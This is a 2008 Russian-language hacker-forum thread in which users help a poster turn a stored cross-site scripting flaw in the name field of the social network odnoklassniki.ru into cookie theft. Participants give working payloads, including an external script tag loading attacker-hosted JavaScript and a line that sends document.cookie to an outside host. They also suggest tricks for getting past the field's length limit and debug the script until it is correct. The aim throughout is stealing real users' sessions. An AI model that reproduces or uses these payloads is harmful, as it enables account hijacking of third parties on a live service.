Форум АНТИЧАТ - Итак наверно всем известно что на одноклассниках есть xss

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Итак наверно всем известно что на одноклассниках есть xss (https://forum.antichat.xyz/showthread.php?t=67287)

andrey_a87

14.04.2008 16:02

Итак наверно всем известно что на одноклассниках есть xss

но вот что делать если не помещается мой скрипт в отведенное мне поле?

~Real F@ck!~

14.04.2008 16:04

мы экстрасенсы ? хсс в студию

andrey_a87

14.04.2008 16:12

~Real F@ck!~

14.04.2008 16:15

Цитата:

http://s.netsec.ru/andreya87.gif

это как я понял твой скрипт, попробуй сделать переадресацию с другого сайта, что бы использовалось меньше символов в урл.

andrey_a87

14.04.2008 16:16

например? всё равно не уместится...

Qwazar

14.04.2008 16:21

А сколько символов ограничение? Вместо "document.location=", можно navigate('') попробовать. Короче получится.

andrey_a87

14.04.2008 16:27

умещается только <script>document.location='http://s.netsec.ru/andr

andrey_a87

14.04.2008 16:29

~Real F@ck!~

14.04.2008 16:30

как то можно обойти это ограничение, только я зобыл как, нужно кеша спросить

andrey_a87

14.04.2008 16:38

мммм жаль....

GrAmOzEkA

14.04.2008 16:49

Зарегь себе хост где нибуть и создай там *.js
document.location='http://s.netsec.ru/andreya87.gif'+document.cookie';
потом создай index.html с содержанием:
<script src="http://твой сайт/*.js"></script>
должно прокатить

Qwazar

14.04.2008 16:52

А разбить на несколько запросов никак? Типа

Код:

<script>i="2"+document.cookie;/*

ТУТ ВСЯКАЯ ЛАБУДЕНЬ

*/alert(i);</script>

Ну, т.е. первым запросом шлёшь

Код:

<script>i="2"+document.cookie;/*

вторым

Код:

*/alert(i);</script>

Basurman

14.04.2008 16:53

andrey_a87

14.04.2008 16:54

Цитата:

Сообщение от ~Real F@ck!~

как то можно обойти это ограничение, только я зобыл как, нужно кеша спросить

А можешь плиз у него спросить?

Pir4tt

14.04.2008 16:56

а сохранить страничку и ручками исправить ограничение поля на количество символов не прокатит?)) чё за хсс-то там..

andrey_a87

14.04.2008 17:26

xss на имени весит...измените имя и поробуйте написать у себя на форуме...

andrey_a87

14.04.2008 17:29

способ gramozeki не прокатывает,а способ на разбиение я считаю не уместным....может я не прав...

Qwazar

14.04.2008 17:30

andrey_a87, ну ты попробуй :) А вообще то, что Basurman написал должно прокатить.

miniden

14.04.2008 18:23

я делал фреймом , подсойденял скирипт, но всеравно, даже если оно и вместиться, то потом на форуме имя всеравно обрежут, тоесть для алерта места хватает, а для норм скрипта нет...

Игорь Михайлович

14.04.2008 18:34

создай на сайте дж скрипт и скр его.

~Real F@ck!~

14.04.2008 18:53

Цитата:

А можешь плиз у него спросить?

кеша щас нет в сети

~Real F@ck!~

14.04.2008 18:54

а про инфрейм это правильная мысль

andrey_a87

14.04.2008 19:32

а поподробнее можно про инфрейм, как это реализуется?

andrey_a87

15.04.2008 10:55

ну в общем сделал скрипт поместил его в поле имени,захожу на свой форум пытаюсь написать сообщение и пропало поле ввода...подробнее об xss на odnoklassniki.ru можно прочитать http://video.antichat.ru/file259.html
скрипт выглядит вот так <script src="www.avlo.freevar.com/1.js"></script>

Scipio

15.04.2008 11:59

в поле ваше имя вводи: <script src=http://stranica.narod.ru/1.js></script>
в 1.js напиши:
alert("XSS");
и пробуй, если алерт вылетит, то все работает, потом просто изменишь 1.js как тебе нужно и все
т.е. смысл как я понимаюв том что кавычки фильтруются, и протокол ты не указал

andrey_a87

15.04.2008 15:01

Цитата:

Сообщение от Scipio

Сделал как ты сказал,но алерт не вышел, но вот почему не знаю....вот в если в поле имени поставить <script>alert(/test/)</script> то алерт вылетает....мдяяяя дела...

andrey_a87

15.04.2008 15:03

В поле имени стоит <script src="www.avlo.freevar.com/1.js"></script> в 1.js написано alert(/tets/);
не срабатывает =(( когда хочешь добавить сообщение когда должен срабатывать скрипт до появляется надпись добавить сообщение и усё...ни поля,ни фига....

andrey_a87

15.04.2008 15:04

а протокол не умещается написать)))))

Qwazar

15.04.2008 15:08

Цитата:

http://www.avlo.freevar.com/1.js

Пишет файл не найден, ты уверен что ты туда его положил?

BlackCats

15.04.2008 15:15

хост дерьмовый, у него быввают заскоки.

Scipio

15.04.2008 15:17

Цитата:

Сообщение от andrey_a87

я же тебе сказал:
1. нужно прописывать протокол http://
2. кавычки как я понимаю там экранируются, не используй их
3. http://www.avlo.freevar.com/1.js не существует и вобще на этот сайт ругается

Зарегай страничку на народе как я тебе сказал

andrey_a87

15.04.2008 15:43

зарегил на народе.... alvo150.narod.ru
index.html
______
<script src="http://www.alvo150.narod.ru/1.js"></script>

1.js
____
document.location='http://s.netsec.ru/andreya87.gif'+document.cookie';

Когда захожу на http://www.alvo150.narod.ru то не перекидывает меня на 1.js...

Просмотр исходного
<script src="http://www.alvo150.narod.ru/1.js"></script></textarea></form>
</title></comment></a>
</div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>
<div style="background:url(http://www.tns-counter.ru/V13a****yandex_ru/ru/CP1251/tmsec=narod_total/)"></div>
<script language="JavaScript" src="http://yabs.yandex.ru/show/163"></script>

mister

15.04.2008 15:54

document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;

andrey_a87

15.04.2008 16:05

ну да...но смысл не меняется не перходит он на этот скрипт....когда заходишь на http://www.alvo150.narod.ru

Qwazar

15.04.2008 17:14

Цитата:

Сообщение от andrey_a87

ну да...но смысл не меняется не перходит он на этот скрипт....когда заходишь на http://www.alvo150.narod.ru

Да потому что он у тебя кривой

У тебя там написано:

Код:

document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie';

Убери апостроф после "document.cookie".

Сделай так:

Код:

document.location='http://s.netsec.ru/andreya87.gif?'+document.cookie;

З.Ы.
Да и вообще, лучше взять в привычку - перед тем как тестировать что либо удалённо, проверить скрипты на локальной тачке.

Светлый

22.04.2008 11:12

выдал такую ошибку :

Код:

500 Servlet Exception

one.ejb.control.client.ControllerFailureException: Can not obtain allowed

EJB service provider.

        at one.app.community.dk.model.AWebModel.get(AWebModel.java:536)

        at one.app.community.dk.model.AWebModel.handleEvent(AWebModel.java:464)

        at one.app.community.dk.model.AWebModel.performLogin(AWebModel.java:298)

        at one.app.community.dk.model.AWebModel.performLoginUser(AWebModel.java:286)

        at one.app.community.dk.servlet.DesktopServlet.handleNotLoginnedException(DesktopServlet.java:264)

        at one.app.community.dk.servlet.DesktopServlet.doPost(DesktopServlet.java:128)

        at one.app.community.dk.servlet.DesktopServlet.doGet(DesktopServlet.java:60)

        at javax.servlet.http.HttpServlet.service(HttpServlet.java:126)

        at javax.servlet.http.HttpServlet.service(HttpServlet.java:103)

        at com.caucho.server.http.FilterChainServlet.doFilter(FilterChainServlet.java:96)

        at one.app.community.filter.BufferingFilter.doFilter(BufferingFilter.java:85)

        at com.caucho.server.http.FilterChainFilter.doFilter(FilterChainFilter.java:88)

        at com.caucho.http.filter.GzipFilter.doFilter(GzipFilter.java:128)

        at com.caucho.server.http.FilterChainFilter.doFilter(FilterChainFilter.java:88)

        at com.caucho.server.http.Invocation.service(Invocation.java:315)

        at com.caucho.server.http.HttpRequest.handleRequest(HttpRequest.java:253)

        at com.caucho.server.http.HttpRequest.handleConnection(HttpRequest.java:170)

        at com.caucho.server.TcpConnection.run(TcpConnection.java:139)

        at java.lang.Thread.run(Thread.java:619)

Resin 2.1.16 (built Tue Feb 15 11:12:27 PST 2005)

без разрывов.
мб кому-то поможет

Время: 06:31